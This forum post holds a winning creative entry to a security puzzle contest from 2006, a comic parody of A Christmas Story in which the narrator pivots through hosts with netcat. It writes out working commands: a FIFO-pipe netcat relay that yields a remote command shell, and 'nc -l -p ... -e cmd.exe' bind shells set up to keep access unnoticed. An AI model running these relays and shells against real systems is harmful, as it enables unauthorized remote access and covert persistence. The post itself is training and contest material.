Post Sat Jan 13, 2007 3:48 am

Skillz Dec 06 Winning Entry - Creative

Mike Tremoulet

A little more... A little more... I had it all!  I finally had all of Little OphCrack Annie's code.  I read back what I had decoded:

DRINK
MORE
OVAL
TINE
BUY
COUNTER
HACK
RELOADE
USE
NET
CAT
RELAY

I couldn't believe my eyes.  All this time, I had waited for a crummy advertisement for Ovaltine?!  I mean, everybody wanted a copy of that book, but it turned out to be an advertisement?  This wasn't helping me get my Red Rider at all.

Then I started to think about the last part of Annie's message.
Something was bugging me about it.  I thought about it, pulled out my calculator, and punched in a few numbers.  Then I scribbled out the eighth line, and wrote down:

E414A2208C930D79 4A3B108F3FA6CB6D

"There," I thought, "much better!" and turned back to the problem at hand.  How to get at that mystery list?  Annie had given one more clue in her message about netcat relays.  Hmm...  Ah ha!  I knew that the nc executable on the lamp was netcat - Dad loved to use that for everything he could.  And the chimney file had a p in the description; that meant that it was a FIFO pipe ready for use as a relay!  My old man must be using the lamp to hide things from Mom, to have left things like that out in the open.  Or had Randy been trying the same trick as I was?

I thought for a minute, and started a netcat listener on my laptop.  I decided to use port 80; if I was lucky, Dad would just think it was normal browser traffic.

nc -l -p 80

Then I sent the following command to the lamp:

nc 10.11.11.11 80 0<chimney | nc 10.10.10.10 2222 1>chimney

And to my amazement, I got a command shell on the furnace!  Quickly, I told it to "type c:\christmas_gift_list.txt" as quickly as my ten-year-old fingers could type.  There it was!  The old man had come through after all!

Then it hit me.  The old man!  Surely he'd find out about this!  And I uttered those words that no ten-year-old should ever utter at home - "Oh, SH--"

"RALPHIE!!!!"  My mother's voice rang out.

"Ralphie, you get out here this instant!  Where did you learn this language?!"  I slammed my laptop shut so Mom wouldn't see, and hurried out into the hall.  "Ralphie, come here.  You need your mouth washed out.  Don't you ever let me hear you use that kind of language again!"
And, with that, she pulled out the Morton Anti-viral soap from the bathroom cabinet and shoved it in my mouth.

Once she let me go, I ran back to my laptop.  How could I have been so stupid!  As soon as I dropped the connection, Dad's netcat listener would stop and he'd know for sure that I had been there!  What to do, what to do....  It was a Windows server; I could schedule a task to restart the listener, but that would leave an entry in the logfile that just might tip my hand.  Working quickly, I decided that I could start up a new session and restart the original one.  Fortunately, I hadn't lost my connection to the furnace while eating the soap earlier.  I gave it this command:

start c:\nc.exe -l -p 3333 -e cmd.exe

and exited out of the shell.  I restarted the listener on my laptop, and sent the email back to the lamp (changing port 2222 to port 3333), and silently cheered as I saw the command shell again.  Almost there!
I fed in the last command to restart the listener:

start c:\nc.exe -l -p 2222 -e cmd.exe

and breathed a huge sigh of relief.  It looks like I had gotten away with it!  Dad would be able to see the connection if he checked now, but the odds of that were slim.  Still, I had to create some sort of diversion.  What to do, what to do....  The old man did love his turkey, that's for sure.  I was counting on that as I connected to Skodo's FTP site, pulled down a special DLL that he had told me about, and ran the DLL injection program to inject turkey scents into the furnace output.  The smell of turkey ought to keep the old man occupied for a while.

I could smell the turkey scent wafting through the house now.  And then, I heard the neighbor's dogs charge in downstairs.  Oh, no, what had I done?!  I was in for it now....


Congrats and well done,
Don
CISSP, MCSE, CSTA, Security+ SME